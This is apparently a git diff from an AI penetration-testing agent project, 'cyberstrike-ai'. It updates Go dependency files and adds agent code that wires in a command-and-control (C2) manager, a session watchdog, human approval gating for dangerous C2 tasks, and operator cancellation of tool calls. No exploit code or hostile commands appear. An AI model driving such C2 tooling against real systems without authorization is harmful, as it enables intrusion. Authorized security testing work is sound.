go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0 // indirect
|
||||
go.opentelemetry.io/otel/metric v1.34.0 // indirect
|
||||
go.opentelemetry.io/proto/otlp v1.5.0 // indirect
|
||||
go.uber.org/multierr v1.11.0 // indirect
|
||||
golang.org/x/arch v0.15.0 // indirect
|
||||
golang.org/x/crypto v0.39.0 // indirect
|
||||
golang.org/x/exp v0.0.0-20250305212735-054e65f0b394 // indirect
|
||||
golang.org/x/net v0.24.0 // indirect
|
||||
golang.org/x/net v0.34.0 // indirect
|
||||
golang.org/x/oauth2 v0.30.0 // indirect
|
||||
golang.org/x/sys v0.33.0 // indirect
|
||||
golang.org/x/text v0.26.0 // indirect
|
||||
google.golang.org/protobuf v1.30.0 // indirect
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f // indirect
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f // indirect
|
||||
google.golang.org/grpc v1.69.4 // indirect
|
||||
google.golang.org/protobuf v1.36.3 // indirect
|
||||
)
|
||||
|
||||
// 修复钉钉 Stream SDK 在长连接断开(熄屏/网络中断)后 "panic: send on closed channel" 问题
|
||||
|
||||
@@ -17,25 +17,27 @@ github.com/bytedance/sonic v1.15.0 h1:/PXeWFaR5ElNcVE84U0dOHjiMHQOwNIx3K4ymzh/uS
|
||||
github.com/bytedance/sonic v1.15.0/go.mod h1:tFkWrPz0/CUCLEF4ri4UkHekCIcdnkqXw9VduqpJh0k=
|
||||
github.com/bytedance/sonic/loader v0.5.0 h1:gXH3KVnatgY7loH5/TkeVyXPfESoqSBSBEiDd5VjlgE=
|
||||
github.com/bytedance/sonic/loader v0.5.0/go.mod h1:AR4NYCk5DdzZizZ5djGqQ92eEhCCcdf5x77udYiSJRo=
|
||||
github.com/cenkalti/backoff/v4 v4.3.0 h1:MyRJ/UdXutAwSAT+s3wNd7MfTIcy71VQueUuFK343L8=
|
||||
github.com/cenkalti/backoff/v4 v4.3.0/go.mod h1:Y3VNntkOUPxTVeUxJ/G5vcM//AlwfmyYozVcomhLiZE=
|
||||
github.com/certifi/gocertifi v0.0.0-20190105021004-abcd57078448/go.mod h1:GJKEexRPVJrBSOjoqN5VNOIKJ5Q3RViH6eu3puDRwx4=
|
||||
github.com/cloudwego/base64x v0.1.6 h1:t11wG9AECkCDk5fMSoxmufanudBtJ+/HemLstXDLI2M=
|
||||
github.com/cloudwego/base64x v0.1.6/go.mod h1:OFcloc187FXDaYHvrNIjxSe8ncn0OOM8gEHfghB2IPU=
|
||||
github.com/cloudwego/eino v0.8.8 h1:64NuheQBmxOXe/28Tm85rkBkxXMB5ZhjSu/j0RDFyZU=
|
||||
github.com/cloudwego/eino v0.8.8/go.mod h1:+2N4nsMPxA6kGBHpH+75JuTfEcGprAMTdsZESrShKpU=
|
||||
github.com/cloudwego/eino v0.8.13 h1:z5dhaZNN8TWZbP/lgKxGmF26Ii8fPeUlQCGV/NTtms0=
|
||||
github.com/cloudwego/eino v0.8.13/go.mod h1:+2N4nsMPxA6kGBHpH+75JuTfEcGprAMTdsZESrShKpU=
|
||||
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2 h1:v2w9TyLAmNsMWo8NwntCc76uvNf6isTFkHB+oZZ8NqI=
|
||||
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:os5Tq5FuSoz/MLqAdZER3ip49Oef9prc0kVsKsPYO48=
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2 h1:H5Ohr3OWSjiTOe7y9pOPyVCKCNjAVj9YMaWmvZNTYPg=
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:HnxTQxmhuev6zaBl92EHUy/vEDWCuoE/OE4cTiF5JCg=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2 h1:PRli0CmPfgUhwMGWGEAwg8nxde8hInC2OWv0vcIuwMk=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:KVOVct4e2BQ7epDONW2QE1qU5+ccoh91FzJTs9vIJj0=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2 h1:8sOFcDf9MtMVDQyozZtuhrmt+mLQRHEaf6dYC20Vxhs=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:9R0RQrQSpg1JaNnRtw7+RfRAAv0HgdE348YnrlZ6coo=
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2 h1:OzKPBfGCJhjbtO+WfIMNSSnXxsj6/hUiyYOTaG2LUf4=
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:zyPrZT2bO6LyRJgVksQowR18jVgyLSvqK93hnO53/Lc=
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.12 h1:vcwNXeT7bpaXMNwUhtcHZwMYY8II2jAihuooyivmEZ0=
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.12/go.mod h1:ve/+/hLZMvxD5AieQ355xHIFhAZVlsG4rdwTnE16aQU=
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16 h1:q242n5P5Tx3a2QLaBmkfEpfRs/o17Ac6u3EAgItEEOc=
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16/go.mod h1:p+l0zBB0GjjX8HTlbTs3g3KfUFwZC11bsCGZOXW/3L0=
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b h1:GIOC/VnXuSQx79mnQ3HgMvECjtyqvpJipmSUTFFfVsc=
|
||||
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b/go.mod h1:HnxTQxmhuev6zaBl92EHUy/vEDWCuoE/OE4cTiF5JCg=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b h1:3owjV4nv+XRplavTeqFlCeAV4v7EHR2tIXDqLEmPc38=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b/go.mod h1:KVOVct4e2BQ7epDONW2QE1qU5+ccoh91FzJTs9vIJj0=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b h1:j8sj/5QiooV3LWphFDsJvyD/csWwupz+UKXeG+nqiNg=
|
||||
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b/go.mod h1:9R0RQrQSpg1JaNnRtw7+RfRAAv0HgdE348YnrlZ6coo=
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b h1:pOqupZQyc46rw2Z0HeybtTmSMTwqfTrbRuGDuDsNf2A=
|
||||
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b/go.mod h1:zyPrZT2bO6LyRJgVksQowR18jVgyLSvqK93hnO53/Lc=
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.13 h1:5XHRTiTD5bt9KQrMHcfvuWNklEC3tpm3XHejdozt9vM=
|
||||
github.com/cloudwego/eino-ext/components/model/openai v0.1.13/go.mod h1:mgIoqYYOc0eECCqvLbEYpOJrQNTNxkwXzSJzFU+v5sQ=
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 h1:EeVcR1TslRA2IdNW1h/2LaGbPlffwGhQm99jM3zWZiI=
|
||||
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17/go.mod h1:Zkcx6DPTR2NfWmtSXbhItswGw6hqUezNPhNcke0pOG8=
|
||||
github.com/creack/pty v1.1.24 h1:bJrF4RRfyJnbTJqzRLHzcGaZK1NeM5kTC9jGgovnR1s=
|
||||
github.com/creack/pty v1.1.24/go.mod h1:08sCNb52WyoAwi2QDyzUCTgcvVFhUzewun7wtTfvcwE=
|
||||
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||
@@ -59,6 +61,11 @@ github.com/gin-gonic/gin v1.9.1 h1:4idEAncQnU5cB7BeOkPtxjfCSye0AAm1R0RVIqJ+Jmg=
|
||||
github.com/gin-gonic/gin v1.9.1/go.mod h1:hPrL7YrpYKXt5YId3A/Tnip5kqbEAP+KLuI3SUcPTeU=
|
||||
github.com/go-check/check v0.0.0-20180628173108-788fd7840127 h1:0gkP6mzaMqkmpcJYCFOLkIBwI7xFExG03bbkOkCvUPI=
|
||||
github.com/go-check/check v0.0.0-20180628173108-788fd7840127/go.mod h1:9ES+weclKsC9YodN5RgxqK/VD9HM9JsCSh7rNhMZE98=
|
||||
github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
|
||||
github.com/go-logr/logr v1.4.2 h1:6pFjapn8bFcIbiKo3XT4j/BhANplGihG6tvd+8rYgrY=
|
||||
github.com/go-logr/logr v1.4.2/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
|
||||
github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag=
|
||||
github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE=
|
||||
github.com/go-playground/assert/v2 v2.2.0 h1:JvknZsQTYeFEAhQwI4qEt9cyV5ONwRHC+lYKSsYSR8s=
|
||||
github.com/go-playground/assert/v2 v2.2.0/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4=
|
||||
github.com/go-playground/locales v0.14.1 h1:EWaQ/wswjilfKLTECiXz7Rh+3BjFhfDFKv/oXslEjJA=
|
||||
@@ -75,8 +82,8 @@ github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69
|
||||
github.com/golang-jwt/jwt/v5 v5.2.2 h1:Rl4B7itRWVtYIHFrSNd7vhTiz9UpLdi6gZhZ3wEeDy8=
|
||||
github.com/golang-jwt/jwt/v5 v5.2.2/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
|
||||
github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
|
||||
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek=
|
||||
github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps=
|
||||
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
|
||||
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
|
||||
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
|
||||
@@ -90,6 +97,8 @@ github.com/gopherjs/gopherjs v1.17.2 h1:fQnZVsXk8uxXIStYb0N4bGk7jeyTalG/wsZjQ25d
|
||||
github.com/gopherjs/gopherjs v1.17.2/go.mod h1:pRRIvn/QzFLrKfvEz3qUuEhtE/zLCWfreZ6J5gM2i+k=
|
||||
github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
|
||||
github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
|
||||
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1 h1:VNqngBF40hVlDloBruUehVYC3ArSgIyScOAyMRqBxRg=
|
||||
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1/go.mod h1:RBRO7fro65R6tjKzYgLAFo0t1QEXY1Dp+i/bvpRiqiQ=
|
||||
github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
|
||||
github.com/jessevdk/go-flags v1.4.0/go.mod h1:4FA24M0QyGHXBuZZK/XkWh8h0e1EYbRYJSGM75WSRxI=
|
||||
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
|
||||
@@ -191,6 +200,26 @@ github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zI
|
||||
github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4=
|
||||
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA=
|
||||
go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A=
|
||||
go.opentelemetry.io/otel v1.34.0 h1:zRLXxLCgL1WyKsPVrgbSdMN4c0FMkDAskSTQP+0hdUY=
|
||||
go.opentelemetry.io/otel v1.34.0/go.mod h1:OWFPOQ+h4G8xpyjgqo4SxJYdDQ/qmRH+wivy7zzx9oI=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0 h1:OeNbIYk/2C15ckl7glBlOBp5+WlYsOElzTNmiPW/x60=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0/go.mod h1:7Bept48yIeqxP2OZ9/AqIpYS94h2or0aB4FypJTc8ZM=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0 h1:BEj3SPM81McUZHYjRS5pEgNgnmzGJ5tRpU5krWnV8Bs=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0/go.mod h1:9cKLGBDzI/F3NoHLQGm4ZrYdIHsvGt6ej6hUowxY0J4=
|
||||
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0 h1:jBpDk4HAUsrnVO1FsfCfCOTEc/MkInJmvfCHYLFiT80=
|
||||
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0/go.mod h1:H9LUIM1daaeZaz91vZcfeM0fejXPmgCYE8ZhzqfJuiU=
|
||||
go.opentelemetry.io/otel/metric v1.34.0 h1:+eTR3U0MyfWjRDhmFMxe2SsW64QrZ84AOhvqS7Y+PoQ=
|
||||
go.opentelemetry.io/otel/metric v1.34.0/go.mod h1:CEDrp0fy2D0MvkXE+dPV7cMi8tWZwX3dmaIhwPOaqHE=
|
||||
go.opentelemetry.io/otel/sdk v1.34.0 h1:95zS4k/2GOy069d321O8jWgYsW3MzVV+KuSPKp7Wr1A=
|
||||
go.opentelemetry.io/otel/sdk v1.34.0/go.mod h1:0e/pNiaMAqaykJGKbi+tSjWfNNHMTxoC9qANsCzbyxU=
|
||||
go.opentelemetry.io/otel/sdk/metric v1.31.0 h1:i9hxxLJF/9kkvfHppyLL55aW7iIJz4JjxTeYusH7zMc=
|
||||
go.opentelemetry.io/otel/sdk/metric v1.31.0/go.mod h1:CRInTMVvNhUKgSAMbKyTMxqOBC0zgyxzW55lZzX43Y8=
|
||||
go.opentelemetry.io/otel/trace v1.34.0 h1:+ouXS2V8Rd4hp4580a8q23bg0azF2nI8cqLYnC8mh/k=
|
||||
go.opentelemetry.io/otel/trace v1.34.0/go.mod h1:Svm7lSjQD7kG7KJ/MUHPVXSDGz2OX4h0M2jHBhmSfRE=
|
||||
go.opentelemetry.io/proto/otlp v1.5.0 h1:xJvq7gMzB31/d406fB8U5CBdyQGw4P399D1aQWU/3i4=
|
||||
go.opentelemetry.io/proto/otlp v1.5.0/go.mod h1:keN8WnHxOy8PG0rQZjJJ5A2ebUoafqWp0eVQ4yIXvJ4=
|
||||
go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk=
|
||||
go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo=
|
||||
go.uber.org/mock v0.4.0 h1:VcM4ZOtdbR4f6VXfiOpwpVJDL6lCReaZ6mw31wqh7KU=
|
||||
@@ -216,8 +245,8 @@ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn
|
||||
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.24.0 h1:1PcaxkF854Fu3+lvBIx5SYn9wRlBzzcnHZSiaFFAb0w=
|
||||
golang.org/x/net v0.24.0/go.mod h1:2Q7sJY5mzlzWjKtYUEXSlBWCdyaioyXzRB2RtU8KVE8=
|
||||
golang.org/x/net v0.34.0 h1:Mb7Mrk043xzHgnRM88suvJFwzVrRfHEHJEl5/71CKw0=
|
||||
golang.org/x/net v0.34.0/go.mod h1:di0qlW3YNM5oh6GqDGQr92MyTozJPmybPK4Ev/Gm31k=
|
||||
golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI=
|
||||
golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU=
|
||||
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
@@ -251,9 +280,14 @@ golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8T
|
||||
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
|
||||
google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng=
|
||||
google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f h1:gap6+3Gk41EItBuyi4XX/bp4oqJ3UwuIMl25yGinuAA=
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f/go.mod h1:Ic02D47M+zbarjYYUlK57y316f2MoN0gjAwI3f2S95o=
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f h1:OxYkA3wjPsZyBylwymxSHa7ViiW1Sml4ToBrncvFehI=
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f/go.mod h1:+2Yz8+CLJbIfL9z73EW45avw8Lmge3xVElCP9zEKi50=
|
||||
google.golang.org/grpc v1.69.4 h1:MF5TftSMkd8GLw/m0KM6V8CMOCY6NZ1NQDPGFgbTt4A=
|
||||
google.golang.org/grpc v1.69.4/go.mod h1:vyjdE6jLBI76dgpDojsFGNaHlxdjXN9ghpnd2o7JGZ4=
|
||||
google.golang.org/protobuf v1.36.3 h1:82DV7MYdb8anAVi3qge1wSnMDrnKK7ebr+I0hHRN1BU=
|
||||
google.golang.org/protobuf v1.36.3/go.mod h1:9fA7Ob0pmnwhb644+1+CVWFRbNajQ6iRojtC/QF5bRE=
|
||||
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
|
||||
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
|
||||
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 832 KiB After Width: | Height: | Size: 726 KiB |
+50
-3
@@ -13,6 +13,7 @@ import (
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
@@ -74,6 +75,11 @@ func agentConversationIDFromContext(ctx context.Context) string {
|
||||
return v
|
||||
}
|
||||
|
||||
// ConversationIDFromContext 返回当前 Agent 请求上下文中注入的对话 ID(如 C2 MCP 入队与人机协同门控使用)。
|
||||
func ConversationIDFromContext(ctx context.Context) string {
|
||||
return agentConversationIDFromContext(ctx)
|
||||
}
|
||||
|
||||
// ToolCallInterceptor allows caller to gate or rewrite tool arguments just before execution.
|
||||
// Returning a non-nil error means the tool call is rejected and execution is skipped.
|
||||
type ToolCallInterceptor func(ctx context.Context, toolName string, args map[string]interface{}, toolCallID string) (map[string]interface{}, error)
|
||||
@@ -187,6 +193,10 @@ type ChatMessage struct {
|
||||
Content string `json:"content,omitempty"`
|
||||
ToolCalls []ToolCall `json:"tool_calls,omitempty"`
|
||||
ToolCallID string `json:"tool_call_id,omitempty"`
|
||||
// ToolName 仅 tool 角色:从 Eino/轨迹 JSON 的 name 或 tool_name 恢复,供续跑构造 ToolMessage。
|
||||
ToolName string `json:"tool_name,omitempty"`
|
||||
// ReasoningContent 对应 OpenAI/DeepSeek 的 reasoning_content;思考模式 + 工具调用后续跑须回传(见 DeepSeek 文档)。
|
||||
ReasoningContent string `json:"reasoning_content,omitempty"`
|
||||
}
|
||||
|
||||
// MarshalJSON 自定义JSON序列化,将tool_calls中的arguments转换为JSON字符串
|
||||
@@ -200,11 +210,17 @@ func (cm ChatMessage) MarshalJSON() ([]byte, error) {
|
||||
if cm.Content != "" {
|
||||
aux["content"] = cm.Content
|
||||
}
|
||||
if cm.ReasoningContent != "" {
|
||||
aux["reasoning_content"] = cm.ReasoningContent
|
||||
}
|
||||
|
||||
// 添加tool_call_id(如果存在)
|
||||
if cm.ToolCallID != "" {
|
||||
aux["tool_call_id"] = cm.ToolCallID
|
||||
}
|
||||
if cm.ToolName != "" {
|
||||
aux["tool_name"] = cm.ToolName
|
||||
}
|
||||
|
||||
// 转换tool_calls,将arguments转换为JSON字符串
|
||||
if len(cm.ToolCalls) > 0 {
|
||||
@@ -432,6 +448,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
Content: msg.Content,
|
||||
ToolCalls: msg.ToolCalls,
|
||||
ToolCallID: msg.ToolCallID,
|
||||
ToolName: msg.ToolName,
|
||||
})
|
||||
addedCount++
|
||||
contentPreview := msg.Content
|
||||
@@ -651,8 +668,8 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
|
||||
// 检查是否有工具调用
|
||||
if len(choice.Message.ToolCalls) > 0 {
|
||||
// 思考内容:如果本轮启用了思考流式增量(thinking_stream_*),前端会去重;
|
||||
// 同时也需要在该“思考阶段结束”时补一条可落库的 thinking(用于刷新后持久化展示)。
|
||||
// ReAct 助手正文流式增量(thinking_stream_*)在 UI 上归为「思考」;若与 streamId 重复则前端会去重。
|
||||
// 该条 thinking 用于刷新后持久化展示(与流式聚合一致)。
|
||||
if choice.Message.Content != "" {
|
||||
sendProgress("thinking", choice.Message.Content, map[string]interface{}{
|
||||
"iteration": i + 1,
|
||||
@@ -1485,6 +1502,8 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
|
||||
}
|
||||
}()
|
||||
}
|
||||
// C2 危险任务 HITL 异步等待:须绑定整条 Agent 运行期 ctx,而非单次工具子 ctx(return 时会被 cancel)
|
||||
toolCtx = c2.WithHITLRunContext(toolCtx, ctx)
|
||||
|
||||
// 检查是否是外部MCP工具(通过工具名称映射)
|
||||
a.mu.RLock()
|
||||
@@ -1506,7 +1525,9 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
|
||||
// 如果调用失败(如工具不存在、超时),返回友好的错误信息而不是抛出异常
|
||||
if err != nil {
|
||||
detail := err.Error()
|
||||
if errors.Is(err, context.DeadlineExceeded) {
|
||||
if errors.Is(err, context.Canceled) {
|
||||
detail = "工具调用已被手动终止(MCP 监控页)。智能体将携带此结果继续后续步骤,整条任务不会因此被停止。"
|
||||
} else if errors.Is(err, context.DeadlineExceeded) {
|
||||
min := 10
|
||||
if a.agentConfig != nil && a.agentConfig.ToolTimeoutMinutes > 0 {
|
||||
min = a.agentConfig.ToolTimeoutMinutes
|
||||
@@ -1895,9 +1916,35 @@ func (a *Agent) ExecuteMCPToolForConversation(ctx context.Context, conversationI
|
||||
a.currentConversationID = prev
|
||||
a.mu.Unlock()
|
||||
}()
|
||||
ctx = withAgentConversationID(ctx, conversationID)
|
||||
return a.executeToolViaMCP(ctx, toolName, args)
|
||||
}
|
||||
|
||||
// RecordLocalToolExecution 将非 CallTool 路径完成的工具调用写入 MCP 监控库(与 CallTool 落库一致),返回 executionId。
|
||||
// 用于 Eino filesystem execute 等场景,使助手气泡「渗透测试详情」与常规 MCP 一致可点进监控。
|
||||
func (a *Agent) RecordLocalToolExecution(toolName string, args map[string]interface{}, resultText string, invokeErr error) string {
|
||||
if a == nil || a.mcpServer == nil {
|
||||
return ""
|
||||
}
|
||||
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
|
||||
}
|
||||
|
||||
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
|
||||
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
|
||||
executionID = strings.TrimSpace(executionID)
|
||||
note = strings.TrimSpace(note)
|
||||
if executionID == "" {
|
||||
return false
|
||||
}
|
||||
if a.mcpServer != nil && a.mcpServer.CancelToolExecutionWithNote(executionID, note) {
|
||||
return true
|
||||
}
|
||||
if a.externalMCPMgr != nil && a.externalMCPMgr.CancelToolExecutionWithNote(executionID, note) {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// extractQuotedToolName 尝试从错误信息中提取被引用的工具名称
|
||||
func extractQuotedToolName(errMsg string) string {
|
||||
start := strings.Index(errMsg, "\"")
|
||||
|
||||
+85
-2
@@ -13,8 +13,10 @@ import (
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/einoobserve"
|
||||
"cyberstrike-ai/internal/handler"
|
||||
"cyberstrike-ai/internal/knowledge"
|
||||
"cyberstrike-ai/internal/logger"
|
||||
@@ -51,6 +53,10 @@ type App struct {
|
||||
robotMu sync.Mutex // 保护钉钉/飞书长连接的 cancel
|
||||
dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启
|
||||
larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启
|
||||
c2Manager *c2.Manager // C2 管理器(未启用 C2 时为 nil)
|
||||
c2Watchdog *c2.SessionWatchdog // C2 会话看门狗
|
||||
c2WatchdogCancel context.CancelFunc // 看门狗取消函数
|
||||
c2Handler *handler.C2Handler // C2 REST(与 Manager 生命周期同步)
|
||||
}
|
||||
|
||||
// New 创建新应用
|
||||
@@ -85,6 +91,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
|
||||
// 创建MCP服务器(带数据库持久化)
|
||||
mcpServer := mcp.NewServerWithStorage(log.Logger, db)
|
